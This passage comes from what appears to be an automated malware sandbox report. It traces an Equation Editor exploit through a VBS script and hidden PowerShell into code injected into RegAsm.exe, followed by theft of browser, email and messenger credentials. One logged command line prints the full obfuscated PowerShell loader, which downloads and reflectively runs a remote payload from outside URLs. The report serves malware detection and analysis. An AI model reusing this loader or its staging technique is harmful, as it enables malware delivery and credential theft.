                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 13_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00419662 mouse_event, 13_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"
                Source: RegAsm.exe, 0000000D.00000002.919771377.0000000000374000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                Source: RegAsm.exe, 0000000D.00000002.919771377.0000000000357000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GdProgram Manager@
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GdProgram Manager8|
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerChromeion 01-10- 2024 [Compatibility Mode] - Microsoft Wordsz
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.dr | Binary or memory string: [Program Manager]
                Source: RegAsm.exe, 0000000D.00000002.919771377.0000000000393000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GdProgram Manager
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00434CB6 cpuid 13_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 13_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 13_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 13_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 13_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 13_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 13_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 13_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA, 13_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: IsValidCodePage,GetLocaleInfoW, 13_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 13_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041B890 GetSystemTimes,Sleep,GetSystemTimes,__aulldiv, 13_2_0041B890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041B69E GetComputerNameExW,GetUserNameW, 13_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 13_2_00449210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041739B GetVersionExW, 15_2_0041739B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 13_2_0040BA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: ESMTPPassword 16_2_004033F0
